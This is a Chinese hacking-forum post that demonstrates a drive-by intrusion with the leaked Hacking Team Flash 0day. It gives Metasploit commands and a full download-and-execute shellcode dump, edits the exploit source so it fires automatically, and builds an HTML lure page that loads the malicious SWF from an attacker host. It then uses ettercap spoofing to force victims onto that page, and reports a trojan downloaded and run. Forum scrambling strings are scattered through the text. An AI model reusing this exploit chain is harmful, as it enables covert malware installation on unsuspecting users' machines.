找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1557|回复: 0
打印 上一主题 下一主题

flash 0day之手工代码修改制作下载者实例入侵演示

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:55 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

. D* z* i$ J: r! u3 h9 }9 T 三、flash 0day之手工代码修改制作下载者实例入侵演示 - m' Y& j- u7 G( V5 ?

9 Y# J" b: k. ?: W9 y. n! C

& d: J" E" R2 Q1 {5 J$ j7 F 利用到的工具: $ h0 s* C* N6 Q, A* q

+ Z" J0 q# G0 p }3 C4 z# _

( j0 e6 E$ {& D0 T; ? Msf 2 Q1 t3 Z% v3 K! z: ^' T8 \

1 u) j& x8 f& }# E% V) L$ g1 v0 Y9 f

2 S! _& t5 U: @# B& T3 E R Ettercap ( e0 g- S0 t5 u6 h: w% d2 g& e

8 f& A% h, k) l: ~9 h4 N! g

( O' R, Z( L6 t7 @+ g( O* c }: P Adobe Flash CS6 " s2 j, R6 W- y, R

D" P( [; {5 {* z" e9 l) m8 |. m6 G

. {' h# D0 Z4 g% B1 X7 [" ? Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 " m0 G3 e2 h) x! N7 U% J6 c" R( E

# ]* y ?$ C4 x# X& @

8 b- [) t X/ x% M2 Q( j" \ 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_execshow options . W8 H% @, j! I D! p

" M; b I/ Y, I$ _4 ~7 m/ [" }2 R

3 m3 u" M2 X; Z: O5 f$ P- i$ d, s 如图: 3 \0 o+ Q- x R' ^4 }2 W4 g

, \5 n# `/ I. V

& g6 d3 q% R) p D+ E   + O; b# B' C6 X! Y

$ h6 v6 m3 m8 t! f* D

5 V( [# C8 M* c- Q   9 d+ ~& \2 w4 W, p' J( A

7 w f1 e! @. D1 o! J/ ]5 T

9 K$ W6 G* i: S 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: : J" m* F$ N7 N3 t0 }, E& R$ |' }

5 X8 I4 v; q. L6 K# J2 F1 c% C) Z

4 E7 {2 [* B+ \7 x/ J( w7 n/ I/ x8 [   . g. F' ?+ o# q* {7 @9 z1 o w3 t; A

6 N8 w2 W. I/ }9 I, P

1 Y- U$ h9 ?) v" J4 w9 J   # B% @# d7 g* `6 I) \

. M+ S2 m" g# a! H. ^; b8 D

. ]1 w+ `+ ?2 ~! n3 s% a 然后执行generate -t dword生成shellcode,如下: a8 a" n1 a2 j4 ~) S8 D- s( T

8 k; X) _- y7 Y0 `* G: G9 o& z

! b j3 x8 \. B y @! Q5 l   * m. X) O7 n; |# z# C3 G- G+ Y

2 M4 Q) }2 @7 z: j4 m

7 r3 t8 k( S% G5 j9 K) ?- M 复制代码到文本下便于我们一会编辑flash exp,如下: + j: m; D3 q+ a

; a( ]$ X( \( _" S" P

R+ ]# E# H4 w2 C. R 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 3 q& u' o! r* C$ a

; W4 b# l& {# M) U, c

" c& @5 k( d2 u- ?" Y9 k 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ( M. L: c% ]: M% F6 A' H4 y

* h0 H9 S! a Z) o) L

, i# J! A7 Y1 C7 D 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, " q! d4 X! s, F% V$ s

7 w) F1 |4 ]3 _3 n2 V

; d* v, D; y. e* [& f 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 G+ Q8 ^0 ]( d( D. ~

: Q' @5 a) ?& V. E% n4 t, ~" Q; B

' `# P0 y1 B+ O4 [/ A 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, 1 F8 c8 f% h# A& i

& |3 ~) d! V! y/ k

* X* ^" I& o @/ G; n: P% K" R5 v 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, / W; h3 [7 H2 N# S* Q1 R" a( ]3 c

A& ]* \ _0 P2 z! g& _% \' }

! A) W2 J# {* t+ A: e6 Y( v 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 1 j: b% }& i& `" ]9 b i

7 o. t+ J- w+ ` q: ~

! b+ V! ?1 U! \& M+ Q' y8 B 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, ! c Q* j% F9 T5 q3 w9 p- O

+ t7 k2 F n2 t# w

7 w( s, s0 ?, g; M5 k5 a( Q- Z 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, / F$ ^) f; d( ]) R) s a) b

" O% v0 I- I* t( z" F1 G

+ [5 K. _3 d3 D4 q& Z9 u" a9 l' [0 N 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, ) H+ ]8 G6 _$ z& r n

# Z) O8 `$ ~* F9 A

: [1 m: q8 l9 H H& o$ E 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, % K: Y! `: w& z: z$ ^% K7 W

. G# G7 \- ~# G% |& }4 n" g/ J) j: c0 |

' e3 U1 W2 b) K0 F; s8 S 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 9 J3 p) g$ P# D- V! K& d

% z$ h: v3 f8 E/ E5 G$ f' I8 ^

2 t5 T, N: V: u# u8 a- q# s/ Q; f 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, " o: ~( _3 l1 V+ m! l

2 ?: \, ?9 f% [/ [

* X ~" B/ C7 F) Y' ]+ n, w 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 & Q3 q- j( W2 t% P

+ w+ z; N* i7 u, P7 Z0 C

' ?6 Y9 \) ^5 P/ a8 }1 d   " _7 r/ [1 T& o

1 o7 }4 [8 @! _( }9 X% ~- _

, d- q8 }( Y. C0 }& z( T z   $ V/ d/ Z7 r, e# N* Q' W3 r

7 \# [) l3 h$ P& u

. u2 U! z1 n- g 下面我们来修改flash 0day exp,需要修改三个文件,分别为: * l- K. U4 B' U) v6 ]) ~

- J- h! B p3 f& p* f2 d c

2 E. X9 Q$ I0 E% {" t7 w4 O/ d8 M   $ u }/ b! c% H0 U9 c& L7 {

5 \: O3 y" _3 A R- ^# e

9 }* K: U# e' Q6 i8 e5 r4 j 先修改ShellWin32.as,部分源代码如图: " a9 ~) ]8 [$ k$ } R

5 N+ [$ Y! @6 h, P

. X( v2 F% O5 T   5 L! u c$ R9 S; a4 q

3 q5 [( A7 s& Y

. f( |% ~) w. D+ Y. z, ?* l 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 2 G% Q' H6 w0 W% i! O p3 a

+ g6 j, @6 ]# K$ g+ T$ U1 ]( {

8 n8 z7 K; e. E( ?& b" x   ' V+ I$ @. {% K, f( `( Y% z# {; _

0 ^! d# w- W8 l% d6 F

3 j: G J; {; y+ _5 e0 J 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: 4 l6 g0 Q9 ]) s( b) r4 T

9 F, Q8 D9 ^# Y' O

; ]! k. p4 T3 M# @   ( u. s0 k# J! z

) X' @; }* k5 W" I- Y* L4 f

# N( x* b0 h5 l" g3 q+ q 换行在后面加一句TryExpl();注意是l不是数字1,然后如图: ! O. R+ n( p% R4 G \& ]7 [

9 c5 j4 @, T- u( w& v( }7 Z8 ~

0 ~+ L7 b* c7 M1 ?1 z o% x o9 }   3 f9 l0 ^& \, ~9 N9 K

. ]1 v) f8 n6 r; O9 n

' X5 i {( T* O" E' h" k! G1 A0 @   3 U0 P, p) C- J$ r: e$ e2 @2 g

1 D$ B5 V6 v4 x6 x4 U2 e

/ x5 ~' u$ X8 |6 O( R! e   ; w4 @1 v5 N' o |$ \8 Y+ |1 L

. \, W( O% d# b( a" S6 E

4 x; B+ ^2 _1 O+ a 然后点保存,下面我们来编译一下,打开 - A0 \, a. l# u

# L% P% D b ` o1 Q

$ V2 B7 X# p' C! e: } exp1.fla然后点文件-发布,看看编译没错误 ( o6 C! `" o4 O$ H0 Y; p' A- h

1 V; t1 H' W- p! M0 x

4 D a5 z0 ?" [   1 {* F4 ~) _* i8 {

& F6 q( \5 T4 T

5 T' y' _/ N: u0 G4 w2 c9 h9 {   - G" `6 [6 v, x3 r

8 M0 Q1 w U6 ?9 L

. }1 i$ G9 J, k! ~/ ?" L) d5 _+ L' b   - W0 c1 l' ^0 ^0 h

. h9 R! W+ g2 Q+ y' V& E

* Q: R1 j7 G! c- I8 g   8 d' j' |9 k' M" Q) x

% i' e5 }* U* N1 X0 b

1 d* W5 E7 t; F8 i 然后我们把生成的 # c+ r& | `. S# i# v

% K, R4 x4 T- Y, n+ x4 |1 S

* G* C$ z: r, U- i7 t exp1.swf丢到kailinux /var/www/html下: 7 B' n7 W* |; ~) h8 Z7 V

6 G. {4 G' o$ L4 J

- E( K( H* Y; V# T4 \+ d& H 然后把这段代码好好编辑一下 ( J+ j! S- w7 A. u5 }! f- c1 X1 a

- `$ g( K" _9 A$ p

5 C6 l' F* O2 q+ C   h& w, ^8 A7 {

5 p% }, k, P- C+ u$ q3 [- F

O7 T6 l; C7 ]) X. t9 t8 e2 f" O   $ _( {: ^4 S( F) H

: z& ]+ x% `% V% H

- u( G/ r; S. F" w( ^1 Q+ `! c   + F5 w+ P3 B4 d4 Q2 H3 J

0 e- {+ G. j' m8 {2 I

% s1 _. {" B- M, G. ^) q   ) M- f4 G% |" @

" u2 ~& J t4 R7 B4 a

T, i J6 h3 a   - S5 Q. E7 ` V5 |

7 i/ h, P( N$ K/ _4 f" _1 F2 @$ G

( H' i$ L: [# K w5 r# e   2 Q6 \8 k/ h9 S0 E

* f* i6 S3 \' O5 v+ ^$ U; z

1 c6 C' k8 a) ^ <!DOCTYPE html> 4 ^ l, [6 c: @/ c" I6 f/ b& g

! ?% e# w- R; X4 t# x" C Q

3 [7 @) A2 k8 O5 ^ <html> ( Y3 D, Q, W. o$ L

( Y+ B( S* M' f; u

& Y/ q! ?$ I5 M2 J1 {+ a, m <head> 9 U, S8 U) Z+ W2 l0 g' j7 N/ c

( z+ g1 N6 i6 c7 E

0 ?, I; C) q# c <meta http-equiv="Content-Type" content="text/html; `( [ o2 q9 m: G+ |. }

4 {5 {5 F1 f$ q& S

% e3 t: D- K; H& H charset=utf-8"/> 6 ~0 ]) L- K# C+ a3 m6 J

: p, ^% c6 A* i$ P

2 c% X8 _' j) u k </head> 7 G/ m! [9 T* D0 r. _

; Z+ f, T, _7 C5 P' @8 U m' A

& k4 T8 P3 A% ?% T' }9 ~ <body> 0 t0 q( ~3 O8 i' A) h

2 o, a: n0 M& d: S( f- q3 `

7 _% F3 G0 }" Z <h2> Please wait, the requested page is loading...</h2> ! t& i* Q6 C3 f' G. v; R. Z7 R

2 j0 G' d5 c4 S& @

# I" D) C/ T/ J7 f; O! ^, t) `, f <br> # [+ I1 A9 H5 f' r) e+ @4 f

3 S$ D+ B8 g- l2 Y

0 d( V j1 i/ j) @/ _ <OBJECT 3 B: Q' R: ]6 J! c3 t1 Y u. b' A

: k( m6 R& I- D; L) [; M

; d+ ^6 x; u1 a c; A2 f' g7 a, n classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000"  WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie ! P7 }0 ?& J5 b( Q' l9 |7 `

( [" L, A+ p7 k' B$ k

' Z, C! X1 {) F2 ?4 L0 u VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 7 J# @1 d; Y' D' V) W, E

( c$ m& N( L! ?* m" _

M& X! ?5 l# t% C0 W </body> , p/ n# p1 {& }0 E/ N9 d+ q. A; A

# l9 G% X) R( K# r7 N

) f$ E4 z9 W5 ^8 ?% H <script> 2 l# ^( z6 ?9 l6 }0 q) P

9 s* y, p3 Z$ _: \7 A( L

$ r# k8 N9 b- o$ M) h6 P( A     setTimeout(function () { 3 p/ x( v4 \2 k: X6 F/ c

- u8 I \$ B! b6 U- r

4 e6 u0 [/ b. p! c4 n/ ~8 ^          6 J- Y% f# J& j( g$ ]

4 |: A0 Q, i& }

" n% {. C4 @. X- _+ C window.location.reload(); . [/ r- R1 I8 \% ^. g3 ^* N

+ V0 n4 D9 V& P$ x* a; i

7 I9 A2 F6 w9 D; b7 d6 Y% w; U1 m7 \; O     }, 10000); ' Q1 Q# }$ j: J$ W. T9 p

8 ]3 O' f- l8 K7 b

6 w) J4 q& `5 s# y. i% V3 Y8 Q) h8 B   : U0 B9 a$ a2 V, x: q

/ k2 x% N4 k# ?& C+ @ J- r" F

& y6 P0 w! p2 O9 f </script> * l4 T6 k9 }* I! [- P% N/ a

9 r E2 K4 G! ?1 V- K! }

4 P5 q% @0 w9 @# d </html> ) m3 \" i7 ?; g( q# e

0 ^- w6 r7 e5 R

$ M! H5 k1 i% r; v0 c   5 K) y8 x- P3 S! |. d

% ?; b7 k' ?0 [6 s3 j/ l2 X

9 L8 }1 f% \6 h 注意:192.168.0.109kaliip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: S+ |9 p. \5 d0 t4 V/ m! y

, K6 [. F0 H# ~. R0 |

7 @# n. g+ g) o8 g( b; T   4 S6 `1 J/ `! e# n2 ~

: L+ U# q* O5 `- D' `

- L0 o9 |- r$ z1 p! H9 e3 b   + \7 V/ r; g/ C: l$ p/ H

: v; n7 K; m& N# s7 d

% l/ r% c% L% e+ O) O) Q, a" m# ^   ! h5 }# H* {& ]

4 G3 { v: w/ o+ ?: }& j8 y

" | a& \, G% k' t. q. w# ^# x+ v   3 ^! f4 ~" S0 S0 z: h7 L

8 |8 P5 o+ \7 f. a

. D$ c1 x7 a+ C; V( R   & j5 N3 a) _3 q9 O% H

+ a2 l# H2 c1 J" f6 A

. Q8 I4 G R! K1 S" g& t, T 下面我们用ettercap欺骗如图: - M% r* p, U+ f9 w9 e9 _

2 z5 N: T) e& }$ c. n, V1 |$ ~

) ~! W) L4 o: j4 c8 s   4 I( h, |! p/ n3 A

: w! L% C, O1 T# Z

$ [2 A# `5 _, v7 U! x% [   3 l. H9 [; D2 d

- X$ m/ `* s$ @' |

6 l1 v8 J; Y- q0 u/ S4 s. c3 K 下面我们随便访问个网站看看: % m8 ~* h0 t6 z! d* c

( K* R2 Z6 a3 U8 s7 c1 N5 ~0 N

! `/ X0 S$ C: S1 r1 q 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: # G' b/ [3 m; A ~' @- R

! ?' a! d: O Y7 Q" e0 N

8 g0 U% U, V0 C8 Q8 @) W   * T6 h) o( z% g, J

7 r1 ]# s/ q- \$ @2 V5 Y

5 E' ]1 T9 w) y+ G8 l6 F 我们看另一台, 1 a- D! y6 q" E, |4 x2 }6 h

4 s" ?: F! @% R& f6 I2 f0 z0 K

8 Z7 z0 z) B) t% p# G' ?% s% w 提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。 , n- n$ v) ]0 f2 b1 y9 k5 O5 Y

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表